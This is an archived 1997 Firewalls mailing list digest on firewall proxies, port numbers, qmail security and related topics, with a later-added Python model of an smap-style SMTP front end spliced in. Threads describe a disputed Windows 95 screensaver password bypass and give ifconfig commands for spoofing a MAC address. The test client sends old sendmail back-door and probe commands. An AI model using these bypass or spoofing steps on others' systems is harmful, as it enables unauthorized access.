it did not even reach FW-1. cheers! martin khoo drexx@sunphil.mozcom.com on 01/14/97 02:44:57 PM To: firewalls@greatcircle.com, fw-1-mailinglist@us.checkpoint.com cc: (bcc: Martin Khoo/SIN/Lotus) Subject: TIS FWTK and Solstice FW-1 arguing Hello world, Jan.
13, 1996 (10:45pm Manila time) This is a case where the original Sys Admin who setup the old TIS Firewall Toolkit needs to be around. You see, with the following setup: +-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet | | Windows TIS clients FWTK proxy & DNS server The TIS FWTK is configured as a telnet, mail, and ftp proxy server and also as the DNS server. It runs on a PC with FreeBSD. And managing it is like paying up one's dues in hell. (I know, the server design sucks...) With the Firewall-1 installed, we had a rule saying that FTP is allowed from anywhere to anywhere. But with the TIS FWTK having its say in the matter, we can't get FTP services! We can only have FTP services if we bypass the FTP proxy. Please advise me on how to even start making the two boxes work. Please? Most humble newbie, Drexx. "It's a dirty job, but somebody's gotta do it." -- John Wayne ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Division /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++632) 813-6453 to 55 loc. 
222 \_____\ \\ Fax: (++632) 813-3516 \_____\/ Email: drexx@sunphil.mozcom.com ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From firewalls-owner Tue Jan 14 08:56:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA15305 for firewalls-outgoing; Tue, 14 Jan 1997 00:44:54 -0800 (PST) Received: from unitele.com.my ([202.185.128.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA15246 for ; Tue, 14 Jan 1997 00:44:20 -0800 (PST) Received: by acs.unitele.com.my (SMI-8.6/SMI-SVR4) id QAA24624; Tue, 14 Jan 1997 16:42:20 +0800 Date: Tue, 14 Jan 1997 16:42:19 +0800 (SGT) From: Ahmad Munir b Md Ghazali To: Firewalls-Digest@GreatCircle.com Subject: REMOVE Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PLEASE REMOVE s961038@ittm.com.my From firewalls-owner Tue Jan 14 10:16:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA15250 for firewalls-outgoing; Tue, 14 Jan 1997 00:44:26 -0800 (PST) Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA15167 for ; Tue, 14 Jan 1997 00:43:50 -0800 (PST) Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Tue, 14 Jan 1997 08:14:02 GMT Received: by ilmur.if.is (Secure/IFnet/09-12-96); Tue, 14 Jan 1997 08:14:52 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199701140814.IAA03138@ilmur.if.is> Subject: Re: WIN'95 FLAW To: palan@dataprep.com.my (PaLaN) Date: Tue, 14 Jan 1997 08:14:52 +0000 (GMT) Cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4> from "PaLaN" at Jan 14, 97 02:56:24 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I juz 
encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. This does not work for me, I've not tried to switch over to the English keyboard yet (I'm using Icelandic). Gunni gunni@if.is gunni@coda.is From firewalls-owner Tue Jan 14 10:20:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA01498 for firewalls-outgoing; Tue, 14 Jan 1997 06:27:11 -0800 (PST) Received: from bernie.compusmart.ab.ca (bernie.compusmart.ab.ca [199.185.130.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA01485 for ; Tue, 14 Jan 1997 06:27:00 -0800 (PST) Received: from INTREPID (remote421.compusmart.ab.ca [206.75.85.138]) by bernie.compusmart.ab.ca (8.7.4/8.6.5) with ESMTP id IAA29281 for ; Tue, 14 Jan 1997 08:08:22 -0700 (MST) Message-ID: <32DB97E6.790B@compusmart.ab.ca> Date: Tue, 14 Jan 1997 07:27:51 -0700 From: Bob Russell Reply-To: caeits@compusmart.ab.ca Organization: CAE Aviation Ltd. X-Sender: Bob Russell (Unverified) X-Mailer: Mozilla 4.0b1 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: NEC's PrivateNet Firewall X-Priority: Normal Content-Type: multipart/alternative; boundary="----------38CA64623A00" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------38CA64623A00 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii I'm considering using the NEC PrivateNet Firewall to connect 50 users to the Internet. I like the idea of the packaged hardware/software solution. 
I'd appreciate any comments from the users of this service on this firewall in comparison to other solutions such as Firewall-1 or Gauntlet. Thanks Bob Russell UNIX Sys Admin CAE Aviation Ltd
------------38CA64623A00-- From firewalls-owner Tue Jan 14 10:25:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02815 for firewalls-outgoing; Tue, 14 Jan 1997 07:00:33 -0800 (PST) Received: from pa0016c1.kpmg.com (pa0016c1.kpmg.com [199.207.255.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA02709 for ; Tue, 14 Jan 1997 06:59:53 -0800 (PST) From: kenng@kpmg.com Received: by pa0016c1.kpmg.com; id JAA26511; Tue, 14 Jan 1997 09:59:49 -0500 (EST) Received: from pa0016c4.kpmg.com(130.100.150.27) by pa0016c1.kpmg.com via smap (3.2) id xma022996; Tue, 14 Jan 97 09:55:05 -0500 Received: from mailgate5.kpmg.com by pa0016c4.kpmg.com(8.7.3/8.7.3) with SMTP id JAA07296 for ; Tue, 14 Jan 1997 09:53:50 -0500 (EST) Received: from ccMail by mailgate5.kpmg.com (IMA Internet Exchange 2.03 (Beta 5) Enterprise) id 000370DF; Tue, 14 Jan 97 10:18:45 -0500 Mime-Version: 1.0 Date: Tue, 14 Jan 1997 09:50:46 -0500 Message-ID: <000370DF.1741@kpmg.com> Subject: stopping email loops on tis firewall To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I have a TIS firewall here. Occasionally I experience an email loop with someone on the internet who does not know that email from mailer-daemon is not to be responded to, or who has warring vacation programs. Does anyone know of a way to either hold, divert, or nuke any email with a given from or to address? Someone said that it should be doable in sendmail.cf, but I'm not too sure exactly what would need to be done. TIA.
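The smap/smapd split that Martin Khoo and Jörg Pichel recommend earlier in this digest is the usual answer to "sendmail on the firewall": the Internet-facing process speaks only a tiny subset of SMTP, runs unprivileged in a spool directory, and never invokes sendmail itself; a separate smapd later hands the spooled files to sendmail, which never touches the network. The following Python model of that front end is an added example written for this page, not TIS FWTK code. It drives the dialogue as a pure function of input lines so it can be exercised offline. The size and recipient limits mirror smap's maxbytes/maxrecip settings; the envelope-sender deny list is this example's own addition (it is one place a boundary host could refuse a looping correspondent such as the one in the question above, but it is not an FWTK feature and not the sendmail.cf rule being asked about). All addresses and the sample client session are constructed.

```python
"""smap-style SMTP front end (added example, not TIS FWTK code): tiny dialogue, spool, no sendmail."""
import re

MAX_MESSAGE_BYTES = 1_048_576                     # like smap's maxbytes
MAX_RECIPIENTS = 20                               # like smap's maxrecip
DENIED_SENDERS = {"mailer-daemon@example.net"}    # constructed; this example's addition, not smap's
_ADDR = re.compile(r"<?([^<>\s]+@[^<>\s]+)>?$")


def parse_address(arg, keyword):
    """'FROM:<a@b>' / 'TO:<a@b>' -> 'a@b'; '' for the null sender <>; None if malformed."""
    prefix = keyword + ":"
    if not arg.upper().startswith(prefix):
        return None
    rest = arg[len(prefix):].strip()
    if rest == "<>":
        return ""
    m = _ADDR.match(rest)
    return m.group(1).lower() if m else None


class SmapSession:
    """One SMTP conversation; feed(line) returns the reply ('' for body lines inside DATA)."""

    def __init__(self, max_bytes=MAX_MESSAGE_BYTES, max_rcpts=MAX_RECIPIENTS):
        self.max_bytes, self.max_rcpts = max_bytes, max_rcpts
        self.spool, self.in_data = [], False   # spool: accepted (sender, rcpts, body) for smapd
        self._reset_envelope()

    def _reset_envelope(self):
        self.sender, self.rcpts, self.lines, self.size, self.too_big = None, [], [], 0, False

    def feed(self, line):
        line = line.rstrip("\r\n")
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.strip().partition(" ")
        handler = self.COMMANDS.get(verb.upper())
        if handler is None:            # VRFY, EXPN, HELP, WIZ, DEBUG, ... all land here
            return "500 command not recognized"
        return handler(self, arg.strip())

    def cmd_helo(self, arg):
        return "250 relay hello " + (arg or "unknown")

    def cmd_mail(self, arg):
        addr = parse_address(arg, "FROM")
        if self.sender is not None or addr is None:
            return "503 need a single well-formed MAIL FROM:<address>"
        if addr in DENIED_SENDERS:
            return "550 sender refused"
        self.sender = addr
        return "250 sender ok"

    def cmd_rcpt(self, arg):
        addr = parse_address(arg, "TO")
        if self.sender is None or not addr:
            return "503 need MAIL first and a well-formed RCPT TO:<address>"
        if len(self.rcpts) >= self.max_rcpts:
            return "452 too many recipients"
        self.rcpts.append(addr)
        return "250 recipient ok"

    def cmd_data(self, arg):
        if not self.rcpts:
            return "503 need RCPT first"
        self.in_data = True
        return '354 enter mail, end with "." on a line by itself'

    def _data_line(self, line):
        if line != ".":
            if line.startswith(".."):
                line = line[1:]        # undo SMTP dot-stuffing
            self.size += len(line) + 1
            if self.size > self.max_bytes:
                self.too_big = True    # keep reading to the final '.', then refuse
            else:
                self.lines.append(line)
            return ""
        self.in_data = False
        if not self.too_big:
            self.spool.append((self.sender, tuple(self.rcpts), "\n".join(self.lines)))
        reply = "552 message exceeds size limit" if self.too_big else "250 message spooled for smapd"
        self._reset_envelope()
        return reply

    COMMANDS = {"HELO": cmd_helo, "EHLO": cmd_helo, "MAIL": cmd_mail, "RCPT": cmd_rcpt,
                "DATA": cmd_data, "NOOP": lambda self, arg: "250 ok",
                "QUIT": lambda self, arg: "221 closing connection"}


def run_dialogue(client_lines, **limits):
    """Feed scripted client lines to a fresh session; return (reply lines, session)."""
    session = SmapSession(**limits)
    replies = ["220 relay smap-style front end ready"]
    for line in client_lines:
        reply = session.feed(line)
        if reply:
            replies.append(reply)
    return replies, session


# Constructed client session: commands a bastion front end should not understand,
# a refused looping sender, then one ordinary message with a dot-stuffed line.
SAMPLE_CLIENT = [
    "EHLO attacker.example.org",
    "WIZ",                                    # old sendmail back door: unknown here
    "VRFY root",                              # account probing: unknown here
    "MAIL FROM:<mailer-daemon@example.net>",  # on the deny list: refused
    "MAIL FROM:<Alice@example.org>", "RCPT TO:<bob@example.com>", "DATA",
    "Subject: hello", "", "..starts with a dot", ".", "QUIT",
]
```

Running `run_dialogue(SAMPLE_CLIENT)` shows the point of the design: the probes and the old back-door verbs get a flat "500 command not recognized" because the front end simply has no code for them, and the only thing that reaches the spool is a parsed envelope plus a body, which is what smapd later hands to sendmail.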
From firewalls-owner Tue Jan 14 10:28:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03109 for firewalls-outgoing; Tue, 14 Jan 1997 07:05:54 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03102 for ; Tue, 14 Jan 1997 07:05:38 -0800 (PST) Received: from clonvick-pc.cisco.com (sj-dial-3-14.cisco.com [171.68.179.15]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id HAA03185; Tue, 14 Jan 1997 07:05:28 -0800 (PST) Message-Id: <2.2.32.19970114145433.0075fce8@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 14 Jan 1997 08:54:33 -0600 To: blitton@directs.com,
 firewalls@GreatCircle.COM From: Chris Lonvick Subject: Re: Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Bruce, The official protocol assignment list is at: ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers
---snip---
snmp 161/tcp SNMP
snmp 161/udp SNMP
snmptrap 162/tcp SNMPTRAP
snmptrap 162/udp SNMPTRAP # Marshall Rose
---/snip---
Later, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1-713-778-5663 At 05:41 PM 1/13/97 -0600, blitton@directs.com wrote: > Can someone please tell me where I can find a list of port numbers and > process assigned to it. ie port 80 => http, port 443 => shttp. > > I am especially interested in what port number is assigned to snmp. > > Thanks in advance and sorry if this is out of topic.
> > bruce > > From firewalls-owner Tue Jan 14 10:31:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03225 for firewalls-outgoing; Tue, 14 Jan 1997 07:07:40 -0800 (PST) Received: from door.NetCS.COM (door.netcs.com [194.120.74.246]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03174 for ; Tue, 14 Jan 1997 07:06:41 -0800 (PST) Received: from keks.netcs.com [138.199.0.101] by door.NetCS.COM with ESMTP (8.6.10/25-eef) id RAA28627; Tue, 14 Jan 1997 17:05:14 +0100 Received: from slowy (slowy.netcs.com [138.199.32.21]) by keks.netcs.com (8.6.8.1/SCA-6.6) with SMTP id PAA14283; Tue, 14 Jan 1997 15:05:29 GMT Message-ID: <32DB9FD7.7266@netcs.com> Date: Tue, 14 Jan 1997 16:01:43 +0100 From: Oliver Korfmacher Reply-To: okorf@netcs.com Organization: NetCS GmbH X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: WIN'95 FLAW References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not for NT4, at least not in Germany:-) > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > Yes, I have experienced this as well with many systems running Win95. > |/ > ---o0o-@@-o0o--------- > > Gary G. Hull - Technical Consultant > Howard Systems International - Glaxo Wellcome Inc.
> Five Moore Drive - Raleigh, North Carolina 27709 > Tel : (919) 941-4867 - Fax : (919) 483-0056 > email: ggh14854@ussun2f.glaxo.com -- Gruesse, Oliver Korfmacher (okorf@netcs.com, whois OK11 URL: http://www.netcs.com/PEOPLE/okorf.html) From firewalls-owner Tue Jan 14 10:33:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA02657 for firewalls-outgoing; Tue, 14 Jan 1997 06:57:41 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA02639 for ; Tue, 14 Jan 1997 06:57:28 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC01E7.D9B51E10@exch-bel1.attachmate.com>; Tue, 14 Jan 1997 06:54:56 -0800 Message-ID: From: Darren Cromer To: "'PaLaN'" , "'firewalls@greatcircle.com'" Subject: RE: WIN'95 FLAW Date: Tue, 14 Jan 1997 06:56:07 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I guess you could classify this as a security bug, but woe to anyone who relies on the screen saver for any type of security. >---------- >From: PaLaN[SMTP:palan@dataprep.com.my] >Sent: Tuesday, January 14, 1997 5:56 PM >To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU >Subject: WIN'95 FLAW > >Howdy, > >I juz encountered a security (I would call it) flaw in M$ Windows'95 >screensaver !! I don't know anyone of you encountered this or not but here >it goes : > >If the Windows'95 Screen saver is active, you can break into without any >password and all you have to do is : press the "windows" logo key (printed >on the M$ keyboard) and there you are. > >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have >tried this with my own PC and my friends.
It works.....try on your own PC. > >Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here >ok..! Let me know if anyone of you encountered this. > >I'm goin to send M$ a mail on this bug but before that, I need to know >whether any patch available for this...thx. > > >rgds, >PaLaN > > > From firewalls-owner Tue Jan 14 10:38:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03386 for firewalls-outgoing; Tue, 14 Jan 1997 07:10:19 -0800 (PST) Received: from eagle.anheuser-busch.com ([151.145.250.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03331 for ; Tue, 14 Jan 1997 07:09:44 -0800 (PST) Received: (from smap@localhost) by eagle.anheuser-busch.com (8.7.5/8.6.12) id JAA06318 for ; Tue, 14 Jan 1997 09:03:30 -0600 (CST) Received: from stlabcexg001.anheuser-busch.com(151.145.101.151) by eagle.anheuser-busch.com via smap (V1.3) id sma006315; Tue Jan 14 09:03:24 1997 Received: by stlabcexg001.anheuser-busch.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC01FA.911A8F60@stlabcexg001.anheuser-busch.com>; Tue, 14 Jan 1997 09:08:54 -0600 Message-ID: From: "Starkweather, Mike" To: "'firewalls@GreatCircle.COM'" Subject: RE: WIN'95 FLAW Date: Tue, 14 Jan 1997 09:08:58 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I tried setting up a password protected screen saver on a Windows 95 machine here. Once the screen saver activated I was not able to find any key combination (using alt, shift, ctrl, tab and esc) that would bypass the password check. 
ms

----------
From: PaLaN[SMTP:palan@dataprep.com.my]
Sent: Tuesday, January 14, 1997 4:56 PM
To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU
Subject: WIN'95 FLAW

Howdy,

I juz encountered a security (i would call it) flaw in M$ Windows'95
screensaver !! I don't know anyone of you encountered this or not but here
it goes :

If the Windows'95 Screen saver is active, you can break into without any
password and all you have to do is : press the "windows" logo key (printed
on the M$ keyboard) and there you are.

If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
tried this with my own PC and my friends. It works.....try on your own PC.

Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here
ok..! Let me know if anyone of you encountered this.

I'm goin to send M$ a mail on this bug but before that, I need to know
whether any patch available for this...thx.

rgds,
PaLaN

From firewalls-owner Tue Jan 14 10:41:03 1997
Date: Tue, 14 Jan 1997 09:57:03 -0500 (EST)
From: Ken Kempster
To: Pilar Lavin Mera
cc: firewalls@greatcircle.com
Subject: Re: TIS FWtk + netscape
In-Reply-To: <199701141117.MAA08544@hydra.crisa.es>

On Tue, 14 Jan 1997, Pilar Lavin Mera wrote:

> Hello all,
>
> I'm new in this class of list and i don't know if my question is or not
> appropriate, but ... i would appreciate any help.
>
> My company has a network accessing the internet through a SUN Sparc
> Station + Solaris 2.3 and we have installed the TIS FWtoolkit.
> Our problem is that we cannot configure netscape to pass through the
> ftp-proxy.
> Can anyone help us?

Netscape utilizes the anonymous ftp capabilities of the http proxy; the
ftp-gw is for command line ftp. In your netscape proxy config you should
have your firewall name and port 80 for the http, ftp, gopher and security
proxy lines, given that your http-gw is configured for the default port of
80; otherwise 80 would be whatever port it is configured for.

>
> Thanks in advance,
> Pilar.
> plavin@crisa.es
>

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster           kempster@monarch.rnb.com         |
| Network Systems Engineer                 _   _          |
| Republic National Bank                  (.)-(.)         |
|                                          (6 6)          |
|                                          =\o/=          |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~m~~~m~~~~~~~~~~~~~~

From firewalls-owner Tue Jan 14 10:43:05 1997
Date: Tue, 14 Jan 1997 09:44:15 -0500 (EST)
From: Ken Kempster
To: Todd Graham Lewis
cc: Firewalls Mailing List
Subject: Re: Ethernet hardware addresses

On Mon, 13 Jan 1997, Todd Graham Lewis wrote:

> This has been pointed out before, but I thought that I'd pass this along
> to the list to reinforce how worthless ethernet MAC addresses are.
>
> Most (virtually all) ethernet cards allow one to reprogram what MAC
> address it uses. The ioctl under Linux is SIOCSIFHWADDR, for "set
> hardware address". I was going to write my own program to do it, and
> while doing research for that, I discovered that it's already built into
> the standard ifconfig for Linux.
>
> (If you want to write your own, just search for SIOCSIFHWADDR in
> ifconfig.c. The code is really simple; just an ioctl.)
>
> To demonstrate how easy this is to do, watch how long it took me:
>
> (output edited; these are the commands and the interesting output)
>
> reflections# ifconfig eth0
> eth0      Link encap:10Mbps Ethernet  HWaddr 00:A0:24:81:A7:44
> reflections# ifconfig eth0 down
> reflections# ifconfig eth0 hw ether 00:A0:24:81:A7:45
> reflections# ifconfig eth0
> eth0      Link encap:10Mbps Ethernet  HWaddr 00:A0:24:81:A7:45

Is this a permanent change? I was under the impression that the MAC
address was burned in at the factory. Will it revert back to its original
address after a reboot?

>
> Again, if you are using MAC addresses for anything more than _very_
> trivial authentication, be aware that any user under virtually any
> operating system can do what I just did in three commands. If you want
> real security, use Kerberos or some other appropriate cryptosystem.
>
> __
> Todd Graham Lewis                 Linux!                 Core Engineering
> Mindspring Enterprises      tlewis@mindspring.com      (800) 719 4664, x2804
>
>

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster           kempster@monarch.rnb.com         |
| Network Systems Engineer                 _   _          |
| Republic National Bank                  (.)-(.)         |
|                                          (6 6)          |
|                                          =\o/=          |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~m~~~m~~~~~~~~~~~~~~

From firewalls-owner Tue Jan 14 10:45:23 1997
From: Adam Shostack
Message-Id: <199701141435.JAA19291@homeport.org>
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
In-Reply-To: <199701140929.EAA18347@homeport.org> from Darren Reed at "Jan 14, 97 08:32:06 pm"
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Tue, 14 Jan 1997 09:35:09 -0500 (EST)
Cc: firewalls@GreatCircle.COM

Darren Reed wrote:

| I don't want to throw cold water of the qmail authors' enthusiasm, but
| a reality check on this comparison seems needed. It is excellent to see
| someone is doing this but I can't see sendmail fading out the picture
| any time soon.

I'm not qmail's author, Dan Bernstein is. My point in posting that was
to encourage people to look at qmail, since I feel that it is a
substantial win over sendmail, especially in a security context, such
as a firewall.

| In some mail from Adam Shostack, sie said:
| >
| >     qmail                    sendmail
| >     -----                    --------
| >     210k tar.gz              900k tar.gz
|
| how many lines of code ?

16k for qmail, 46k for sendmail (wc *.[ch])

Throwing more water on the comparison, the code in sendmail is easier to
review; Dan has done some work on a C library replacement, and while I
think it's an admirable effort, it does make looking through the code
more difficult.

| the sendmail .tar.gz comes with a _lot_ of other things such as scripts
| for easy building of sendmail.cf, sample sendmail.cf's, etc.
|
| >     one setuid (qmail)       one (root) setuid program
|
| one setuid program is one too many. It's an arguable point.

I agree, but it's set up that way so that only one component
(qmail-queue) can write to the message queue. I know you're familiar
with the risks involved in a world writable directory. Also, qmail-queue
is setuid qmailq, not setuid root.

| >     designed for security    designed to handle complex mail,
| >                              like uucp/smtp/chaos
|
| I'm sure others *must* have asked this question: how do you use sendmail
| in conjunction with qmail so you can handle all the various complexities
| which are found in today's Internet ?

qmail does smtp routing. It can support delivering mail via uux. One of
the projects I'm working on is putting sendmail into a firewall
environment with sendmail on the inside of the network (to support
complexity that I feel qmail could handle; I don't want to fight the
battle to get qmail on the inside. I want to fight the battle to get
sendmail out of a security critical context.)

| >     many small confusing     one famously painful config file
| >     config files
|
| "famously painful" - it is _much_ better than it was. Personally, I would
| prefer to have one config file (the FWTK has one - netperm-table - but many
| small programs) rather than try configure many things to interact correctly.
|
| Why doesn't someone write a sendmail.cf -> qmail configuration converter
| and then compare ?

Mostly because most of the complex things for sendmail (eg, virtual
domaining) are simple in qmail.

| >     release of the month club   bug of the month club
| >     (soon to hit v1.0)
|
| bug of the month/release of the month - which do you go for ?
| They're both bad (but could be worse). It does mean they both
| receive attention which is good.

I have no question which I go for. Bug of the month demands instant
attention. Release of the month does not.

| Not being v1.0 means, to me, it is a young product that has a long way to
| go before it matures.

Yep.

| >     (no security holes)
|
| Correction: no known security holes (yet).

You cut my line about hubris. It's my expectation that qmail security
holes will not be on the order of sendmail holes. I'm willing to bet on
it, even without having reviewed the qmail source.
By that I mean that no one will obtain root privileges with qmail from
either on the internet talking to your smtp port (excepting inetd), and
no one will exploit qmail's binaries to get root privileges once they
have a shell on your machine.

Why? Because qmail is designed so one program has one function. The
smtpd path has no components that run as root. The local binaries are
not setuid, and you have to convolute to get it to deliver mail to the
root account (if you can. I'm happy to deliver all my root mail to
adam+root. Saves me the trouble of su'ing to read a mailbox.)

So, even as a young product, I think it's designed right, and that right
design offers a huge amount of protection. Again, I urge everyone to
take a look. www.qmail.org.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From firewalls-owner Tue Jan 14 11:47:45 1997
Message-Id: <199701141447.JAA19957@MAILSERV-2HIGH.FTP.COM>
To: blitton@directs.com
Cc: firewalls@GreatCircle.com
From: Shishir Belbase
Subject: RE: Question
Date: Tue, 14 Jan 1997 09:54:02 -0500

>>Reply to your message of 1/13/97 11:14 PM
>> Can someone please tell me where I can find a list of port numbers and
>> process assigned to it. ie port 80 => http, port 443 => shttp.

Check the /ETC/SERVICES file of pretty much any tcp/ip kernel and you
should have the port numbers and the programs that use it. Or any other
TCP/IP book.

>> I am especially interested in what port number is assigned to snmp.

	snmp		161
	snmp-trap	162

Chao !!
- Shishir Belbase

From firewalls-owner Tue Jan 14 12:02:09 1997
From: dan@burkegroup.com
Message-ID: <88C4AA3101523000@burke.burkegroup.com>
Date: Tue, 14 Jan 97 10:30:40 -0500
Organization: Burke Group
To: firewalls@greatcircle.com, sneakers@cs.yale.edu
Subject: Re: WIN'95 FLAW

This is unreproducible on my machine as well. (Win 95 w/ SP 1 (I think?)
Pressing Windows key or Alt-Esc brings up password dialog.

> To: PALAN@INET (PaLaN) {palan@dataprep.com.my}
> Copies-to: FIREWALL@INET {firewalls@greatcircle.com},
>            SNEAKERS@INET {sneakers@CS.YALE.EDU}
> From: GUNNI@INET (Gunnar Ingvi Thorisson) {gunni@if.is}
>
> > I juz encountered a security (i would call it) flaw in M$ Windows'95
> > screensaver !! I don't know anyone of you encountered this or not but here
> > it goes :
> >
> > If the Windows'95 Screen saver is active, you can break into without any
> > password and all you have to do is : press the "windows" logo key (printed
> > on the M$ keyboard) and there you are.
> >
> > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> > tried this with my own PC and my friends. It works.....try on your own PC.
>
> This does not work for me, I've not tried to switch over to the English
> keyboard yet (I'm using Icelandic).
>
> Gunni
> gunni@if.is
> gunni@coda.is
>

From firewalls-owner Tue Jan 14 12:18:38 1997
From: dharris@kcp.com
Message-Id: <199701141511.HAA03451@miles.greatcircle.com>
Date: Tue, 14 Jan 1997 09:05:34 -0600
Subject: Re: WIN'95 FLAW
To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU, PaLaN

With Win95Plus and the "Leonardo da Vinci" theme and screen saver this
does not work IF you have created a user account (did not bypass the
Win95 login screen) with the same password as used for the screen saver.

Also, my system is part of an NT server's domain - this may also affect
the protection provided by the screen saver.
Delmer D. Harris
dharris@kcp.com

______________________________ Reply Separator _________________________________
Subject: WIN'95 FLAW
Author: PaLaN at INTERNET-MAIL
Date: 1/14/97 2:56 PM

Howdy,

I juz encountered a security (i would call it) flaw in M$ Windows'95
screensaver !! I don't know anyone of you encountered this or not but here
it goes :

If the Windows'95 Screen saver is active, you can break into without any
password and all you have to do is : press the "windows" logo key (printed
on the M$ keyboard) and there you are.

If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
tried this with my own PC and my friends. It works.....try on your own PC.

Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here
ok..! Let me know if anyone of you encountered this.

I'm goin to send M$ a mail on this bug but before that, I need to know
whether any patch available for this...thx.

rgds,
PaLaN

From firewalls-owner Tue Jan 14 12:21:02 1997
Message-ID: <01BC0240.00EFA880@gavin.tml.co.za>
From: Gavin Ferreiro
To: "'PaLaN'"
Cc: "'firewalls@GreatCircle.COM'"
